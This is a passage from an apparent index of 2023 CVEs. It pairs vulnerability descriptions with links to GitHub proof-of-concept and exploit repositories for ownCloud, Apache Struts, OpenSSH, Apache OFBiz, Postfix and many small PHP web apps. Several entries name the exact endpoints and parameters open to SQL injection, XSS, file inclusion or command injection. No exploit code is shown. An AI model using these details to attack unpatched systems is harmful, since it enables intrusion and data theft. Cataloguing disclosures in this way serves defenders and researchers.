An issue was discovered in ownCloud owncloud/core before 10.13.1. An attacker can access, modify, or delete any file without authentication if the username of a victim is known, and the victim has no signing-key configured. This occurs because pre-signed URLs can be accepted even when no signing-key is configured for the owner of the files. The earliest affected version is 10.6.0.
- [ambionics/owncloud-exploits](https://github.com/ambionics/owncloud-exploits)
### CVE-2023-49313 (2023-11-28)
A dylib injection vulnerability in XMachOViewer 0.04 allows attackers to compromise integrity. By exploiting this, unauthorized code can be injected into the product's processes, potentially leading to remote control and unauthorized access to sensitive user data.
- [louiselalanne/CVE-2023-49313](https://github.com/louiselalanne/CVE-2023-49313)
### CVE-2023-49314 (2023-11-28)
Asana Desktop 2.1.0 on macOS allows code injection because of specific Electron Fuses. There is inadequate protection against code injection through settings such as RunAsNode and EnableNodeCliInspectArguments, and thus r3ggi/electroniz3r can be used to perform an attack.
- [louiselalanne/CVE-2023-49314](https://github.com/louiselalanne/CVE-2023-49314)
### CVE-2023-49339 (2024-02-13)
Ellucian Banner 9.17 allows Insecure Direct Object Reference (IDOR) via a modified bannerId to the /StudentSelfService/ssb/studentCard/retrieveData endpoint.
- [3zizme/CVE-2023-49339](https://github.com/3zizme/CVE-2023-49339)
### CVE-2023-49438 (2023-12-26)
An open redirect vulnerability in the python package Flask-Security-Too <=5.3.2 allows attackers to redirect unsuspecting users to malicious sites via a crafted URL by abusing the ?next parameter on the /login and /register routes.
- [brandon-t-elliott/CVE-2023-49438](https://github.com/brandon-t-elliott/CVE-2023-49438)
### CVE-2023-49453 (2024-03-12)
Reflected cross-site scripting (XSS) vulnerability in Racktables v0.22.0 and before, allows local attackers to execute arbitrary code and obtain sensitive information via the search component in index.php.
- [nitipoom-jar/CVE-2023-49453](https://github.com/nitipoom-jar/CVE-2023-49453)
### CVE-2023-49471 (2024-01-10)
Blind Server-Side Request Forgery (SSRF) vulnerability in karlomikus Bar Assistant before version 3.2.0 does not validate a parameter before making a request through Image::make(), which could allow authenticated remote attackers to execute arbitrary code.
- [zunak/CVE-2023-49471](https://github.com/zunak/CVE-2023-49471)
### CVE-2023-49496
- [HuangYanQwQ/CVE-2023-49496](https://github.com/HuangYanQwQ/CVE-2023-49496)
### CVE-2023-49539 (2024-03-01)
Book Store Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in /bsms_ci/index.php/category. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the category parameter.
- [geraldoalcantara/CVE-2023-49539](https://github.com/geraldoalcantara/CVE-2023-49539)
### CVE-2023-49540 (2024-03-01)
Book Store Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in /bsms_ci/index.php/history. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the history parameter.
- [geraldoalcantara/CVE-2023-49540](https://github.com/geraldoalcantara/CVE-2023-49540)
### CVE-2023-49543 (2024-03-01)
Incorrect access control in Book Store Management System v1 allows attackers to access unauthorized pages and execute administrative functions without authenticating.
- [geraldoalcantara/CVE-2023-49543](https://github.com/geraldoalcantara/CVE-2023-49543)
### CVE-2023-49544 (2024-03-01)
A local file inclusion (LFI) in Customer Support System v1 allows attackers to include internal PHP files and gain unauthorized acces via manipulation of the page= parameter at /customer_support/index.php.
- [geraldoalcantara/CVE-2023-49544](https://github.com/geraldoalcantara/CVE-2023-49544)
### CVE-2023-49545 (2024-03-01)
A directory listing vulnerability in Customer Support System v1 allows attackers to list directories and sensitive files within the application without requiring authorization.
- [geraldoalcantara/CVE-2023-49545](https://github.com/geraldoalcantara/CVE-2023-49545)
### CVE-2023-49546 (2024-03-04)
Customer Support System v1 was discovered to contain a SQL injection vulnerability via the email parameter at /customer_support/ajax.php.
- [geraldoalcantara/CVE-2023-49546](https://github.com/geraldoalcantara/CVE-2023-49546)
### CVE-2023-49547 (2024-03-04)
Customer Support System v1 was discovered to contain a SQL injection vulnerability via the username parameter at /customer_support/ajax.php?action=login.
- [geraldoalcantara/CVE-2023-49547](https://github.com/geraldoalcantara/CVE-2023-49547)
### CVE-2023-49548 (2024-03-04)
Customer Support System v1 was discovered to contain a SQL injection vulnerability via the lastname parameter at /customer_support/ajax.php?action=save_user.
- [geraldoalcantara/CVE-2023-49548](https://github.com/geraldoalcantara/CVE-2023-49548)
### CVE-2023-49606 (2024-05-01)
A use-after-free vulnerability exists in the HTTP Connection Headers parsing in Tinyproxy 1.11.1 and Tinyproxy 1.10.0. A specially crafted HTTP header can trigger reuse of previously freed memory, which leads to memory corruption and could lead to remote code execution. An attacker needs to make an unauthenticated HTTP request to trigger this vulnerability.
- [d0rb/CVE-2023-49606](https://github.com/d0rb/CVE-2023-49606)
### CVE-2023-49950 (2024-02-03)
The Jinja templating in Logpoint SIEM 6.10.0 through 7.x before 7.3.0 does not correctly sanitize log data being displayed when using a custom Jinja template in the Alert view. A remote attacker can craft a cross-site scripting (XSS) payload and send it to any system or device that sends logs to the SIEM. If an alert is created, the payload will execute upon the alert data being viewed with that template, which can lead to sensitive data disclosure.
- [shrikeinfosec/cve-2023-49950](https://github.com/shrikeinfosec/cve-2023-49950)
### CVE-2023-49954 (2023-12-25)
The CRM Integration in 3CX before 18.0.9.23 and 20 before 20.0.0.1494 allows SQL Injection via a first name, search string, or email address.
- [CVE-2023-49954/CVE-2023-49954.github.io](https://github.com/CVE-2023-49954/CVE-2023-49954.github.io)
### CVE-2023-49964 (2023-12-11)
An issue was discovered in Hyland Alfresco Community Edition through 7.2.0. By inserting malicious content in the folder.get.html.ftl file, an attacker may perform SSTI (Server-Side Template Injection) attacks, which can leverage FreeMarker exposed objects to bypass restrictions and achieve RCE (Remote Code Execution). NOTE: this issue exists because of an incomplete fix for CVE-2020-12873.
- [mbadanoiu/CVE-2023-49964](https://github.com/mbadanoiu/CVE-2023-49964)
### CVE-2023-49965 (2024-04-05)
SpaceX Starlink Wi-Fi router Gen 2 before 2023.48.0 allows XSS via the ssid and password parameters on the Setup Page.
- [yoshida-git-ai/SpaceX-Starlink-Router-Gen-2-XSS](https://github.com/yoshida-git-ai/SpaceX-Starlink-Router-Gen-2-XSS)
### CVE-2023-49968 (2024-03-04)
Customer Support System v1 was discovered to contain a SQL injection vulnerability via the id parameter at /customer_support/manage_department.php.
- [geraldoalcantara/CVE-2023-49968](https://github.com/geraldoalcantara/CVE-2023-49968)
### CVE-2023-49969 (2024-03-04)
Customer Support System v1 was discovered to contain a SQL injection vulnerability via the id parameter at /customer_support/index.php?page=edit_customer.
- [geraldoalcantara/CVE-2023-49969](https://github.com/geraldoalcantara/CVE-2023-49969)
### CVE-2023-49970 (2024-03-04)
Customer Support System v1 was discovered to contain a SQL injection vulnerability via the subject parameter at /customer_support/ajax.php?action=save_ticket.
- [geraldoalcantara/CVE-2023-49970](https://github.com/geraldoalcantara/CVE-2023-49970)
### CVE-2023-49971 (2024-03-06)
A cross-site scripting (XSS) vulnerability in Customer Support System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the firstname parameter at /customer_support/index.php?page=customer_list.
- [geraldoalcantara/CVE-2023-49971](https://github.com/geraldoalcantara/CVE-2023-49971)
### CVE-2023-49973 (2024-03-06)
A cross-site scripting (XSS) vulnerability in Customer Support System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the email parameter at /customer_support/index.php?page=customer_list.
- [geraldoalcantara/CVE-2023-49973](https://github.com/geraldoalcantara/CVE-2023-49973)
### CVE-2023-49974 (2024-03-06)
A cross-site scripting (XSS) vulnerability in Customer Support System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the contact parameter at /customer_support/index.php?page=customer_list.
- [geraldoalcantara/CVE-2023-49974](https://github.com/geraldoalcantara/CVE-2023-49974)
### CVE-2023-49976 (2024-03-06)
A cross-site scripting (XSS) vulnerability in Customer Support System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the subject parameter at /customer_support/index.php?page=new_ticket.
- [geraldoalcantara/CVE-2023-49976](https://github.com/geraldoalcantara/CVE-2023-49976)
### CVE-2023-49977 (2024-03-06)
A cross-site scripting (XSS) vulnerability in Customer Support System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the address parameter at /customer_support/index.php?page=new_customer.
- [geraldoalcantara/CVE-2023-49977](https://github.com/geraldoalcantara/CVE-2023-49977)
### CVE-2023-49978 (2024-03-06)
Incorrect access control in Customer Support System v1 allows non-administrator users to access administrative pages and execute actions reserved for administrators.
- [geraldoalcantara/CVE-2023-49978](https://github.com/geraldoalcantara/CVE-2023-49978)
### CVE-2023-49979 (2024-03-06)
A directory listing vulnerability in Customer Support System v1 allows attackers to list directories and sensitive files within the application without requiring authorization.
- [geraldoalcantara/CVE-2023-49979](https://github.com/geraldoalcantara/CVE-2023-49979)
### CVE-2023-49980 (2024-03-06)
A directory listing vulnerability in Best Student Result Management System v1.0 allows attackers to list directories and sensitive files within the application without requiring authorization.
- [geraldoalcantara/CVE-2023-49980](https://github.com/geraldoalcantara/CVE-2023-49980)
### CVE-2023-49981 (2024-03-06)
A directory listing vulnerability in School Fees Management System v1.0 allows attackers to list directories and sensitive files within the application without requiring authorization.
- [geraldoalcantara/CVE-2023-49981](https://github.com/geraldoalcantara/CVE-2023-49981)
### CVE-2023-49982 (2024-03-06)
Broken access control in the component /admin/management/users of School Fees Management System v1.0 allows attackers to escalate privileges and perform Administrative actions, including adding and deleting user accounts.
- [geraldoalcantara/CVE-2023-49982](https://github.com/geraldoalcantara/CVE-2023-49982)
### CVE-2023-49983 (2024-03-06)
A cross-site scripting (XSS) vulnerability in the component /management/class of School Fees Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter.
- [geraldoalcantara/CVE-2023-49983](https://github.com/geraldoalcantara/CVE-2023-49983)
### CVE-2023-49984 (2024-03-06)
A cross-site scripting (XSS) vulnerability in the component /management/settings of School Fees Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter.
- [geraldoalcantara/CVE-2023-49984](https://github.com/geraldoalcantara/CVE-2023-49984)
### CVE-2023-49985 (2024-03-06)
A cross-site scripting (XSS) vulnerability in the component /management/class of School Fees Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the cname parameter.
- [geraldoalcantara/CVE-2023-49985](https://github.com/geraldoalcantara/CVE-2023-49985)
### CVE-2023-49986 (2024-03-07)
A cross-site scripting (XSS) vulnerability in the component /admin/parent of School Fees Management System 1.0 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter.
- [geraldoalcantara/CVE-2023-49986](https://github.com/geraldoalcantara/CVE-2023-49986)
### CVE-2023-49987 (2024-03-07)
A cross-site scripting (XSS) vulnerability in the component /management/term of School Fees Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the tname parameter.
- [geraldoalcantara/CVE-2023-49987](https://github.com/geraldoalcantara/CVE-2023-49987)
### CVE-2023-49988 (2024-03-07)
Hotel Booking Management v1.0 was discovered to contain a SQL injection vulnerability via the npss parameter at rooms.php.
- [geraldoalcantara/CVE-2023-49988](https://github.com/geraldoalcantara/CVE-2023-49988)
### CVE-2023-49989 (2024-03-07)
Hotel Booking Management v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at update.php.
- [geraldoalcantara/CVE-2023-49989](https://github.com/geraldoalcantara/CVE-2023-49989)
### CVE-2023-50029 (2024-06-24)
PHP Injection vulnerability in the module "M4 PDF Extensions" (m4pdf) up to version 3.3.2 from PrestaAddons for PrestaShop allows attackers to run arbitrary code via the M4PDF::saveTemplate() method.
- [absholi7ly/PHP-Injection-in-M4-PDF-Extensions](https://github.com/absholi7ly/PHP-Injection-in-M4-PDF-Extensions)
### CVE-2023-50070 (2023-12-29)
Sourcecodester Customer Support System 1.0 has multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_ticket via department_id, customer_id, and subject.
- [geraldoalcantara/CVE-2023-50070](https://github.com/geraldoalcantara/CVE-2023-50070)
### CVE-2023-50071 (2023-12-29)
Sourcecodester Customer Support System 1.0 has multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_department via id or name.
- [geraldoalcantara/CVE-2023-50071](https://github.com/geraldoalcantara/CVE-2023-50071)
### CVE-2023-50072 (2024-01-13)
A Stored Cross-Site Scripting (XSS) vulnerability exists in OpenKM version 7.1.40 (dbb6e88) With Professional Extension that allows an authenticated user to upload a note on a file which acts as a stored XSS payload. Any user who opens the note of a document file will trigger the XSS.
- [ahrixia/CVE-2023-50072](https://github.com/ahrixia/CVE-2023-50072)
### CVE-2023-50131
- [sajaljat/CVE-2023-50131](https://github.com/sajaljat/CVE-2023-50131)
### CVE-2023-50132
- [sajaljat/CVE-2023-50132](https://github.com/sajaljat/CVE-2023-50132)
### CVE-2023-50164 (2023-12-07)
An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution.\nUsers are recommended to upgrade to versions Struts 2.5.33 or Struts 6.3.0.2 or greater to fix this issue.\n
- [minhbao15677/CVE-2023-50164](https://github.com/minhbao15677/CVE-2023-50164)
- [jakabakos/CVE-2023-50164-Apache-Struts-RCE](https://github.com/jakabakos/CVE-2023-50164-Apache-Struts-RCE)
- [bcdannyboy/CVE-2023-50164](https://github.com/bcdannyboy/CVE-2023-50164)
- [dwisiswant0/cve-2023-50164-poc](https://github.com/dwisiswant0/cve-2023-50164-poc)
- [helsecert/cve-2023-50164](https://github.com/helsecert/cve-2023-50164)
- [Thirukrishnan/CVE-2023-50164-Apache-Struts-RCE](https://github.com/Thirukrishnan/CVE-2023-50164-Apache-Struts-RCE)
- [Trackflaw/CVE-2023-50164-ApacheStruts2-Docker](https://github.com/Trackflaw/CVE-2023-50164-ApacheStruts2-Docker)
- [miles3719/cve-2023-50164](https://github.com/miles3719/cve-2023-50164)
- [aaronm-sysdig/cve-2023-50164](https://github.com/aaronm-sysdig/cve-2023-50164)
- [snyk-labs/CVE-2023-50164-POC](https://github.com/snyk-labs/CVE-2023-50164-POC)
- [sunnyvale-it/CVE-2023-50164-PoC](https://github.com/sunnyvale-it/CVE-2023-50164-PoC)
- [AsfandAliMemon25/CVE-2023-50164Analysis-](https://github.com/AsfandAliMemon25/CVE-2023-50164Analysis-)
- [NikitaPark/CVE-2023-50164-PoC](https://github.com/NikitaPark/CVE-2023-50164-PoC)
### CVE-2023-50226 (2024-05-03)
Parallels Desktop Updater Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop. An attacker must first obtain the ability to execute low-privileged code on the target host system in order to exploit this vulnerability.\n\nThe specific flaw exists within the Updater service. By creating a symbolic link, an attacker can abuse the service to move arbitrary files. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root. Was ZDI-CAN-21227.
- [kn32/parallels-file-move-privesc](https://github.com/kn32/parallels-file-move-privesc)
### CVE-2023-50245 (2023-12-11)
OpenEXR-viewer is a viewer for OpenEXR files with detailed metadata probing. Versions prior to 0.6.1 have a memory overflow vulnerability. This issue is fixed in version 0.6.1.
- [200101WhoAmI/CVE-2023-50245](https://github.com/200101WhoAmI/CVE-2023-50245)
### CVE-2023-50254 (2023-12-22)
Deepin Linux's default document reader `deepin-reader` software suffers from a serious vulnerability in versions prior to 6.0.7 due to a design flaw that leads to remote command execution via crafted docx document. This is a file overwrite vulnerability. Remote code execution (RCE) can be achieved by overwriting files like .bash_rc, .bash_login, etc. RCE will be triggered when the user opens the terminal. Version 6.0.7 contains a patch for the issue.
- [febinrev/deepin-linux_reader_RCE-exploit](https://github.com/febinrev/deepin-linux_reader_RCE-exploit)
### CVE-2023-50386 (2024-02-09)
Improper Control of Dynamically-Managed Code Resources, Unrestricted Upload of File with Dangerous Type, Inclusion of Functionality from Untrusted Control Sphere vulnerability in Apache Solr.This issue affects Apache Solr: from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1.\n\nIn the affected versions, Solr ConfigSets accepted Java jar and class files to be uploaded through the ConfigSets API.\nWhen backing up Solr Collections, these configSet files would be saved to disk when using the LocalFileSystemRepository (the default for backups).\nIf the backup was saved to a directory that Solr uses in its ClassPath/ClassLoaders, then the jar and class files would be available to use with any ConfigSet, trusted or untrusted.\n\nWhen Solr is run in a secure way (Authorization enabled), as is strongly suggested, this vulnerability is limited to extending the Backup permissions with the ability to add libraries.\nUsers are recommended to upgrade to version 8.11.3 or 9.4.1, which fix the issue.\nIn these versions, the following protections have been added:\n\n * Users are no longer able to upload files to a configSet that could be executed via a Java ClassLoader.\n * The Backup API restricts saving backups to directories that are used in the ClassLoader.\n\n
- [vvmdx/Apache-Solr-RCE_CVE-2023-50386_POC](https://github.com/vvmdx/Apache-Solr-RCE_CVE-2023-50386_POC)
### CVE-2023-50387 (2024-02-14)
Certain DNSSEC aspects of the DNS protocol (in RFC 4033, 4034, 4035, 6840, and related RFCs) allow remote attackers to cause a denial of service (CPU consumption) via one or more DNSSEC responses, aka the "KeyTrap" issue. One of the concerns is that, when there is a zone with many DNSKEY and RRSIG records, the protocol specification implies that an algorithm must evaluate all combinations of DNSKEY and RRSIG records.
- [knqyf263/CVE-2023-50387](https://github.com/knqyf263/CVE-2023-50387)
- [Meirelez/SSR-DNSSEC](https://github.com/Meirelez/SSR-DNSSEC)
### CVE-2023-50465 (2023-12-11)
A stored cross-site scripting (XSS) vulnerability exists in Monica (aka MonicaHQ) 4.0.0 via an SVG document uploaded by an authenticated user.
- [Ev3rR3d/CVE-2023-50465](https://github.com/Ev3rR3d/CVE-2023-50465)
### CVE-2023-50564 (2023-12-14)
An arbitrary file upload vulnerability in the component /inc/modules_install.php of Pluck-CMS v4.7.18 allows attackers to execute arbitrary code via uploading a crafted ZIP file.
- [Rai2en/CVE-2023-50564_Pluck-v4.7.18_PoC](https://github.com/Rai2en/CVE-2023-50564_Pluck-v4.7.18_PoC)
- [ipuig/CVE-2023-50564](https://github.com/ipuig/CVE-2023-50564)
- [rwexecute/CVE-2023-50564](https://github.com/rwexecute/CVE-2023-50564)
- [thefizzyfish/CVE-2023-50564-pluck](https://github.com/thefizzyfish/CVE-2023-50564-pluck)
- [Mrterrestrial/CVE-2023-50564](https://github.com/Mrterrestrial/CVE-2023-50564)
- [TanveerS1ngh/Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564](https://github.com/TanveerS1ngh/Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564)
### CVE-2023-50596
- [chandraprarikraj/CVE-2023-50596](https://github.com/chandraprarikraj/CVE-2023-50596)
### CVE-2023-50643 (2024-01-09)
An issue in Evernote Evernote for MacOS v.10.68.2 allows a remote attacker to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments components.
- [giovannipajeu1/CVE-2023-50643](https://github.com/giovannipajeu1/CVE-2023-50643)
### CVE-2023-50685 (2024-05-02)
An issue in Hipcam Cameras RealServer v.1.0 allows a remote attacker to cause a denial of service via a crafted script to the client_port parameter.
- [UnderwaterCoder/Hipcam-RTSP-Format-Validation-Vulnerability](https://github.com/UnderwaterCoder/Hipcam-RTSP-Format-Validation-Vulnerability)
### CVE-2023-50868 (2024-02-14)
The Closest Encloser Proof aspect of the DNS protocol (in RFC 5155 when RFC 9276 guidance is skipped) allows remote attackers to cause a denial of service (CPU consumption for SHA-1 computations) via DNSSEC responses in a random subdomain attack, aka the "NSEC3" issue. The RFC 5155 specification implies that an algorithm must perform thousands of iterations of a hash function in certain situations.
- [Goethe-Universitat-Cybersecurity/NSEC3-Encloser-Attack](https://github.com/Goethe-Universitat-Cybersecurity/NSEC3-Encloser-Attack)
### CVE-2023-50917 (2023-12-15)
MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.
- [Chocapikk/CVE-2023-50917](https://github.com/Chocapikk/CVE-2023-50917)
### CVE-2023-51000
- [Team-Byerus/CVE-2023-51000](https://github.com/Team-Byerus/CVE-2023-51000)
### CVE-2023-51073 (2024-01-11)
An issue in Buffalo LS210D v.1.78-0.03 allows a remote attacker to execute arbitrary code via the Firmware Update Script at /etc/init.d/update_notifications.sh.
- [christopher-pace/CVE-2023-51073](https://github.com/christopher-pace/CVE-2023-51073)
### CVE-2023-51119
- [OscarAkaElvis/CVE-2023-51119](https://github.com/OscarAkaElvis/CVE-2023-51119)
### CVE-2023-51126 (2024-01-10)
Command injection vulnerability in /usr/www/res.php in FLIR AX8 up to 1.46.16 allows attackers to run arbitrary commands via the value parameter.
- [risuxx/CVE-2023-51126](https://github.com/risuxx/CVE-2023-51126)
### CVE-2023-51127 (2024-01-10)
FLIR AX8 thermal sensor cameras up to and including 1.46.16 are vulnerable to Directory Traversal due to improper access restriction. This vulnerability allows an unauthenticated, remote attacker to obtain arbitrary sensitive file contents by uploading a specially crafted symbolic link file.
- [risuxx/CVE-2023-51127](https://github.com/risuxx/CVE-2023-51127)
### CVE-2023-51214
- [chandraprarikraj/CVE-2023-51214](https://github.com/chandraprarikraj/CVE-2023-51214)
### CVE-2023-51281 (2024-03-07)
Cross Site Scripting vulnerability in Customer Support System v.1.0 allows a remote attacker to escalate privileges via a crafted script firstname, "lastname", "middlename", "contact" and address parameters.
- [geraldoalcantara/CVE-2023-51281](https://github.com/geraldoalcantara/CVE-2023-51281)
### CVE-2023-51385 (2023-12-18)
In ssh in OpenSSH before 9.6, OS command injection might occur if a user name or host name has shell metacharacters, and this name is referenced by an expansion token in certain situations. For example, an untrusted Git repository can have a submodule with shell metacharacters in a user name or host name.
- [vin01/poc-proxycommand-vulnerable](https://github.com/vin01/poc-proxycommand-vulnerable)
- [FeatherStark/CVE-2023-51385](https://github.com/FeatherStark/CVE-2023-51385)
- [watarium/poc-cve-2023-51385](https://github.com/watarium/poc-cve-2023-51385)
- [Le1a/CVE-2023-51385](https://github.com/Le1a/CVE-2023-51385)
- [LtmThink/CVE-2023-51385_test](https://github.com/LtmThink/CVE-2023-51385_test)
- [WLaoDuo/CVE-2023-51385_poc-test](https://github.com/WLaoDuo/CVE-2023-51385_poc-test)
- [power1314520/CVE-2023-51385_test](https://github.com/power1314520/CVE-2023-51385_test)
- [WOOOOONG/CVE-2023-51385](https://github.com/WOOOOONG/CVE-2023-51385)
- [uccu99/CVE-2023-51385](https://github.com/uccu99/CVE-2023-51385)
- [julienbrs/exploit-CVE-2023-51385](https://github.com/julienbrs/exploit-CVE-2023-51385)
- [julienbrs/malicious-exploit-CVE-2023-51385](https://github.com/julienbrs/malicious-exploit-CVE-2023-51385)
- [Sonicrrrr/CVE-2023-51385](https://github.com/Sonicrrrr/CVE-2023-51385)
- [farliy-hacker/CVE-2023-51385](https://github.com/farliy-hacker/CVE-2023-51385)
- [farliy-hacker/CVE-2023-51385-save](https://github.com/farliy-hacker/CVE-2023-51385-save)
- [2048JiaLi/CVE-2023-51385](https://github.com/2048JiaLi/CVE-2023-51385)
- [thinkliving2020/CVE-2023-51385-](https://github.com/thinkliving2020/CVE-2023-51385-)
- [c0deur/CVE-2023-51385](https://github.com/c0deur/CVE-2023-51385)
- [endasugrue/CVE-2023-51385_poc](https://github.com/endasugrue/CVE-2023-51385_poc)
- [MiningBot-eth/CVE-2023-51385-exploit](https://github.com/MiningBot-eth/CVE-2023-51385-exploit)
- [Featherw1t/CVE-2023-51385_test](https://github.com/Featherw1t/CVE-2023-51385_test)
### CVE-2023-51409 (2024-04-12)
Unrestricted Upload of File with Dangerous Type vulnerability in Jordy Meow AI Engine: ChatGPT Chatbot.This issue affects AI Engine: ChatGPT Chatbot: from n/a through 1.9.98.\n\n
- [RandomRobbieBF/CVE-2023-51409](https://github.com/RandomRobbieBF/CVE-2023-51409)
### CVE-2023-51448 (2023-12-22)
Cacti provides an operational monitoring and fault management framework. Version 1.2.25 has a Blind SQL Injection (SQLi) vulnerability within the SNMP Notification Receivers feature in the file `‘managers.php’`. An authenticated attacker with the “Settings/Utilities” permission can send a crafted HTTP GET request to the endpoint `‘/cacti/managers.php’` with an SQLi payload in the `‘selected_graphs_array’` HTTP GET parameter. As of time of publication, no patched versions exist.
- [jakabakos/CVE-2023-51448-cacti-sqli-poc](https://github.com/jakabakos/CVE-2023-51448-cacti-sqli-poc)
### CVE-2023-51467 (2023-12-26)
The vulnerability permits attackers to circumvent authentication processes, enabling them to remotely execute arbitrary code\n\n
- [JaneMandy/CVE-2023-51467](https://github.com/JaneMandy/CVE-2023-51467)
- [Chocapikk/CVE-2023-51467](https://github.com/Chocapikk/CVE-2023-51467)
- [K3ysTr0K3R/CVE-2023-51467-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2023-51467-EXPLOIT)
- [jakabakos/Apache-OFBiz-Authentication-Bypass](https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass)
- [Subha-BOO7/Exploit_CVE-2023-51467](https://github.com/Subha-BOO7/Exploit_CVE-2023-51467)
- [JaneMandy/CVE-2023-51467-Exploit](https://github.com/JaneMandy/CVE-2023-51467-Exploit)
- [vulncheck-oss/cve-2023-51467](https://github.com/vulncheck-oss/cve-2023-51467)
- [2ptr/BadBizness-CVE-2023-51467](https://github.com/2ptr/BadBizness-CVE-2023-51467)
- [AhmedMansour93/Event-ID-217-Rule-Name-SOC254-Apache-OFBiz-Auth-Bypass-and-Code-Injection-0Day-CVE-2023-51467-](https://github.com/AhmedMansour93/Event-ID-217-Rule-Name-SOC254-Apache-OFBiz-Auth-Bypass-and-Code-Injection-0Day-CVE-2023-51467-)
### CVE-2023-51504 (2024-02-05)
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dan Dulaney Dan's Embedder for Google Calendar allows Stored XSS.This issue affects Dan's Embedder for Google Calendar: from n/a through 1.2.\n\n
- [Sybelle03/CVE-2023-51504](https://github.com/Sybelle03/CVE-2023-51504)
### CVE-2023-51518 (2024-02-27)
Apache James prior to version 3.7.5 and 3.8.0 exposes a JMX endpoint on localhost subject to pre-authentication deserialisation of untrusted data.\nGiven a deserialisation gadjet, this could be leveraged as part of an exploit chain that could result in privilege escalation.\nNote that by default JMX endpoint is only bound locally.\n\nWe recommend users to:\n - Upgrade to a non-vulnerable Apache James version\n\n - Run Apache James isolated from other processes (docker - dedicated virtual machine)\n - If possible turn off JMX\n\n
- [mbadanoiu/CVE-2023-51518](https://github.com/mbadanoiu/CVE-2023-51518)
### CVE-2023-51764 (2023-12-24)
Postfix through 3.8.5 allows SMTP smuggling unless configured with smtpd_data_restrictions=reject_unauth_pipelining and smtpd_discard_ehlo_keywords=chunking (or certain other options that exist in recent versions). Remote attackers can use a published exploitation technique to inject e-mail messages with a spoofed MAIL FROM address, allowing bypass of an SPF protection mechanism. This occurs because Postfix supports <LF>.<CR><LF> but some other popular e-mail servers do not. To prevent attack variants (by always disallowing <LF> without <CR>), a different solution is required, such as the smtpd_forbid_bare_newline=yes option with a Postfix minimum version of 3.5.23, 3.6.13, 3.7.9, 3.8.4, or 3.9.
- [duy-31/CVE-2023-51764](https://github.com/duy-31/CVE-2023-51764)
- [eeenvik1/CVE-2023-51764](https://github.com/eeenvik1/CVE-2023-51764)
- [d4op/CVE-2023-51764-POC](https://github.com/d4op/CVE-2023-51764-POC)
- [Double-q1015/CVE-2023-51764](https://github.com/Double-q1015/CVE-2023-51764)
### CVE-2023-51800 (2024-02-29)
Cross Site Scripting (XSS) vulnerability in School Fees Management System v.1.0 allows a remote attacker to execute arbitrary code via a crafted payload to the main_settings component in the phone, address, bank, acc_name, acc_number parameters, new_class and cname parameter, add_new_parent function in the name email parameters, new_term function in the tname parameter, and the edit_student function in the name parameter.
- [geraldoalcantara/CVE-2023-51800](https://github.com/geraldoalcantara/CVE-2023-51800)
### CVE-2023-51801 (2024-02-29)
SQL Injection vulnerability in the Simple Student Attendance System v.1.0 allows a remote attacker to execute arbitrary code via a crafted payload to the id parameter in the student_form.php and the class_form.php pages.
- [geraldoalcantara/CVE-2023-51801](https://github.com/geraldoalcantara/CVE-2023-51801)
### CVE-2023-51802 (2024-02-29)
Cross Site Scripting (XSS) vulnerability in the Simple Student Attendance System v.1.0 allows a remote attacker to execute arbitrary code via a crafted payload to the page or class_month parameter in the /php-attendance/attendance_report component.
- [geraldoalcantara/CVE-2023-51802](https://github.com/geraldoalcantara/CVE-2023-51802)
### CVE-2023-51810 (2024-01-16)
SQL injection vulnerability in StackIdeas EasyDiscuss v.5.0.5 and fixed in v.5.0.10 allows a remote attacker to obtain sensitive information via a crafted request to the search parameter in the Users module.
- [Pastea/CVE-2023-51810](https://github.com/Pastea/CVE-2023-51810)
### CVE-2023-52160 (2024-02-22)
The implementation of PEAP in wpa_supplicant through 2.10 allows authentication bypass. For a successful attack, wpa_supplicant must be configured to not verify the network's TLS certificate during Phase 1 authentication, and an eap_peap_decrypt vulnerability can then be abused to skip Phase 2 authentication. The attack vector is sending an EAP-TLV Success packet instead of starting Phase 2. This allows an adversary to impersonate Enterprise Wi-Fi networks.
- [Helica-core/eap_pwn](https://github.com/Helica-core/eap_pwn)
### CVE-2023-52251 (2024-01-25)
An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.
- [BobTheShoplifter/CVE-2023-52251-POC](https://github.com/BobTheShoplifter/CVE-2023-52251-POC)
### CVE-2023-52268
- [squ1dw3rm/CVE-2023-52268](https://github.com/squ1dw3rm/CVE-2023-52268)
### CVE-2023-52654 (2024-05-09)
